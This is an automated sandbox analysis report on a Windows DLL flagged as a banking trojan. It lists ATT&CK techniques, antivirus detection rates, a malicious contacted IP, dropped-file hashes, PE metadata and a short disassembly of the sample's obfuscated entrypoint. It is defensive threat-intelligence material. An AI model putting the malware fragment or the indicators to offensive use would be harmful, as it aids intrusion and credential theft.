Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | 1 Input Capture | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
40% | Virustotal | Browse | ||
48% | ReversingLabs | Win32.Trojan.Zenpak | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
l-0007.l-dc-msedge.net | 13.107.43.16 | true | true |
| unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.189.151.28 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 620332 |
Start date and time: 04/05/202216:25:58 | 2022-05-04 16:25:58 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 12m 32s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | xaj0e933Uv.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 38 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@25/17@0/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 13.107.43.16
- Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6548 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
16:27:23 | API Interceptor | |
16:28:07 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
185.189.151.28 | Get hash | malicious | Browse | ||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse | |||
Get hash | malicious | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
l-0007.l-dc-msedge.net | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-SOFTPLUSCH | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
⊘No context
⊘No context
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.8910535897909355 |
Encrypted: | false |
SSDEEP: | 192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ |
MD5: | F84F6C99316F038F964F3A6DB900038F |
SHA1: | C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1 |
SHA-256: | F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E |
SHA-512: | E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1192 |
Entropy (8bit): | 5.325275554903011 |
Encrypted: | false |
SSDEEP: | 24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5 |
MD5: | 05CF074042A017A42C1877FC5DB819AB |
SHA1: | 5AF2016605B06ECE0BFB3916A9480D6042355188 |
SHA-256: | 971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650 |
SHA-512: | 96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.9748061757983675 |
Encrypted: | false |
SSDEEP: | 24:HTe9EuZf4UzDfHUhKdNWI+ycuZhN6xakSl2PNnq9qd:6B4oGKd41ulQa3cq9K |
MD5: | B25228E0D789A80CC458BDEDCA074352 |
SHA1: | D02F77745E89EDE624F705B49991653478861CDE |
SHA-256: | AB6DDC0161E42079AAE33ED2D5CCF08861E963F50203059A1B641D41CA9E5951 |
SHA-512: | 471FF8CBFD71FE1088146FB506BCDC2120CB1515298F68644F898D49205EEA7F198A97AECC990E6438216F0798B785D2B31CBC597AA2180802AA0B0A53491E62 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.9834931582727697 |
Encrypted: | false |
SSDEEP: | 24:H5e9EuZfO5XDfH+hKdNWI+ycuZhN9akS7PNnq9qd:wBO5z0Kd41ul9a3xq9K |
MD5: | 3216E688A820A84F56F4B051422672D5 |
SHA1: | 66A45E83433BA569C1539A55EE95B8715BF3CDB9 |
SHA-256: | E6B505EA1803ACB819A72DA55DA55A8A45047CB9F64D02682F7B0FB190372B29 |
SHA-512: | 2598C34B7B84CA677422F49B86FD1D96672987E4D9CA6B4DA2392E336B0B458B914C635D059A3F0CA302B14CC1BDD06ADF374EA095B9051011B42558CAC37297 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1141398576088117 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7Ynqq7PN5Dlq5J:+RI+ycuZhN9akS7PNnqX |
MD5: | 476755BF56A208B33F9C4651A06EE5A5 |
SHA1: | 828C47F319540793ABFD06234431820E5594A420 |
SHA-256: | EB5CB6796AF4525D3264AC6A5E123A6D682A1C8431FAFC244EAD44DA8046F91C |
SHA-512: | 4B7FA176700A57354909997E6F70515F57BB61EBADE429B16262BA5BA8C90755F068EB6AF13954BB3FD39911D27DFAAC6C94A10B90F20CAFA1DE647D84F69C42 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.283593156851968 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fp1vOBzxs7+AEszIwkn23fp1vOM:p37Lvkmb6KRfBAWZEifB9 |
MD5: | 9BA74AF8C7DB03DB598E428C80A39C24 |
SHA1: | 1118FB7E3A74DEDA5A4E7C1C7D1B054CBE5C6E1C |
SHA-256: | 29709DDB56A51411468E1EF4A5C98A0CFC749ACB37E58B6BD3574F0F2D302722 |
SHA-512: | 6B24DA377F68A32BCBD70C00CCCB521CB67A6353A2BD06E7C811A50E67F2BD83F3F79BA9CFCE53747E3F507453EF1E12734BBF9BF3FA413A8827BDA4EB3F66D9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.600576810696372 |
Encrypted: | false |
SSDEEP: | 24:etGSa/u2Bg85z7xlfwZD6lgdWqtkZf3rtWI+ycuZhN9akS7PNnq:6fYb5hFCD6wWdJ3rY1ul9a3xq |
MD5: | DB32AF94E50432F083E1DEA228EEF8D4 |
SHA1: | 7BA5E52289B5D9BBAEB3647F32315FB9AFE0BE9E |
SHA-256: | C91C4DB3E42338BB928B22C4207308E4153D45AEC8F734030CED671F0EAE83BD |
SHA-512: | 7AFE704910CF7B27D4D9F756F18B47A159C474B6868378CE68EE105D63AF3E0F5CEEC1DEA5539CFED4DA1E76DA73DA353D16319E63E9F200493486314BDC3C75 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.346663629193138 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfDEifeKaM5DqBVKVrdFAMBJTH:Akka6CDEueKxDcVKdBJj |
MD5: | 2F9D5A7D317AB29D714CEFE888F56699 |
SHA1: | 2DE49F06FDE6EAD8ED5886B017B874FAFBCD6356 |
SHA-256: | 728FA4B4FD272923E395304FA5B40B1F2F98C4D39B88F1BCEDCF81287C9F4EFB |
SHA-512: | 6591BE1739BFA8EB5998A6679F865EE3A07363FFA028E0317B73F79ECAEA7675B4BCC16086B425EE74B422898E98874C7C803C5ADB00FD71088CB007A5017069 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.093636689580821 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grycxak7Ynqql2PN5Dlq5J:+RI+ycuZhN6xakSl2PNnqX |
MD5: | 27A58DEC34A8A930EAF493E122C1D762 |
SHA1: | 84E4A3CA94FA31FF623DE9EE39782AC021D93B32 |
SHA-256: | C9EEA11CDD016DF97932732100DF2AE3F3250F3C49A9270F0BA04F444096B665 |
SHA-512: | D267C3F6B444275A3B32A42010F7352D7DC5098A10A5B0A5FAD5D7E0B79F286BD5BC45B9D94BE1A07B65195B9D90CCE58FE4E2F9E93E708C41702CE97F1F3074 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.182200628670966 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f52wn0zxs7+AEszIwkn23f52sH:p37Lvkmb6KRfh2q0WZEifh2m |
MD5: | 8CB0C7CD433BDC2F02299B6932B4A9E3 |
SHA1: | 00663A78D6DAD361F367FD49A112A56B5C7DFA2B |
SHA-256: | 97DB1A8D4B63512E0C57B113E1F95D861B1FBE14D394B9888480BFB2AD6C3F13 |
SHA-512: | 3072FB0116DB38CBF12CBDBA7D6820DA0C401A7FD7BBB37ACA9564985A3C3F8363D54F0807E06FC2B94D2C9D2B2F94D7E7D74A5B40A1B2C0227CDE522CDBB902 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6207839132053006 |
Encrypted: | false |
SSDEEP: | 24:etGSo8OmU0t3lm85xWAseO4zxQ64pfUPtkZfi1VUWI+ycuZhN6xakSl2PNnq:6iXQ3r5xNOeQfUuJiT31ulQa3cq |
MD5: | 1F0860CDD9E8F6B4501F25728D2131B6 |
SHA1: | 1126BDC01913B693028ECB663123381889362DA8 |
SHA-256: | 3CABCC304A4FA671400D71EBEB21F846983224F97AF93BE2CF2AADA6E3B3E34B |
SHA-512: | E8CD254CCF26A063BD36EF34299F7B9C86450E2A2ED9A958E77F05DE1C829470B0EE6129FA00745ED6A0D8DD9379DB384FF7F704BC5820BBC29A30C0A8F4BCA5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.307968253776901 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfPVEif8KaM5DqBVKVrdFAMBJTH:Akka6CPVEu8KxDcVKdBJj |
MD5: | CEA73A1E9F1D1CC3A29CF5AAE996602A |
SHA1: | 6BF6258A16B4750D4B37D33FF17D8FF99D11ADC9 |
SHA-256: | C232D4309AA78DB4C1FA7E017FA57BFED2E1B05E10090C27DB13BAEB9EE41CC7 |
SHA-512: | 1125BFEC36CDE86F8C6DAC261F366C90723A22633D78C87C03B4048C45D009E18E7602CD9E22029B388E7B57DF0319143756D33449710CEECC21FEC822ED427A |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220504\PowerShell_transcript.506013.O71O_fmz.20220504162805.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1343 |
Entropy (8bit): | 5.36590430076155 |
Encrypted: | false |
SSDEEP: | 24:BxSAI7vBZbx2DOXUWYJobduLCHdV4qWQHjeTKKjX4CIym1ZJXxJobduLCHdV4rN+:BZmvjboO4JobdRdV4tQqDYB1ZDJobdRb |
MD5: | 3FD39DAE5C6C053C927C7C421DF22346 |
SHA1: | 648958C510D633CECD2033A0B76B04A2B8CA6993 |
SHA-256: | 733ABC0BC0C57B87100F55CA1BB3FDCE133B892BF619D86F1C11A2891C3E844E |
SHA-512: | 8DC2BF906F650828FCE8EEC6D7C05B9D5B00DD8044CE5FBD1B7E0220220DBE646C37D118DD9CE6DD886E141EB4A691B43963C214665E03EFAEB55E3C86C5AA1C |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.2386475978649285 |
TrID: |
|
File name: | xaj0e933Uv.dll |
File size: | 442368 |
MD5: | 69e570a35f63ea12cbad7a10b25a6ea4 |
SHA1: | f0ca60563eeb9098ad6133daa1fc48c3987437e2 |
SHA256: | 3362915be3f3ed1572f4ba757d155608f54a460fd935bfe3f37138cf0fe383b6 |
SHA512: | 85658f8418f40fa9f24934b26aa45550dd8fb34425d0af342511b4e64975614071535e99257497f69db25fa87a5cde271bc4a6e1a0971a287f7f2d497d2374ca |
SSDEEP: | 6144:rxpWDRyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:rxpuFlJqYhiVDwGU8OqaX1WW3zNg7 |
TLSH: | D494F14977A11DBBEC0807761CF8C52B9B66BE2CA23A70DEA6683CFF7E175511048706 |
File Content Preview: | MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5...... |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401430 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 0bedc9af0ed7cf2ba33cf662a24d448e |
Instruction |
---|
push ebp |
mov ebp, esp |
add ecx, FFFFFFFFh |
call 00007F4F08B3F6FCh |
pop eax |
pop eax |
mov dword ptr [00414544h], eax |
mov edx, dword ptr [00414660h] |
sub edx, 00005289h |
call edx |
ret |
int3 |
push esi |
mov eax, ebx |
mov dword ptr [00414540h], eax |
pop dword ptr [00414538h] |
mov dword ptr [00414548h], ebp |
mov dword ptr [0041453Ch], edi |
sub dword ptr [00414548h], FFFFFFFCh |
loop 00007F4F08B3F6A5h |
mov dword ptr [ebp+00h], eax |
nop |
ret |
lea ecx, ebx |
pop es |
mov ds, word ptr [ecx] |
lodsb |
lea ebp, dword ptr [ecx+6B2EEEC3h] |
movsb |
xchg eax, esi |
xchg dword ptr [ebx], esp |
shl byte ptr [C2100869h], 1 |
loopne 00007F4F08B3F698h |
pop eax |
or ecx, dword ptr [ebx-5F28A8CFh] |
pop ebx |
je 00007F4F08B3F716h |
sbb dword ptr [esi], eax |
sbb bh, dh |
mov ebp, A52AB60Ah |
xor al, F7h |
sbb eax, 442A8BDAh |
mov edx, 8289DCF1h |
wait |
sub byte ptr [eax-20h], dh |
pop ecx |
or esi, edi |
xchg eax, esp |
loop 00007F4F08B3F757h |
xchg eax, edi |
sti |
cmp eax, 3B0AD66Fh |
dec ebp |
mov esp, E193F8C3h |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb710 | 0xc000 | False | 0.0735880533854 | data | 1.02187881889 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.18017578125 | data | 3.71231531364 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373657226562 | data | 6.02583875365 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x62360 | 0x666 | data | English | United States |
RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
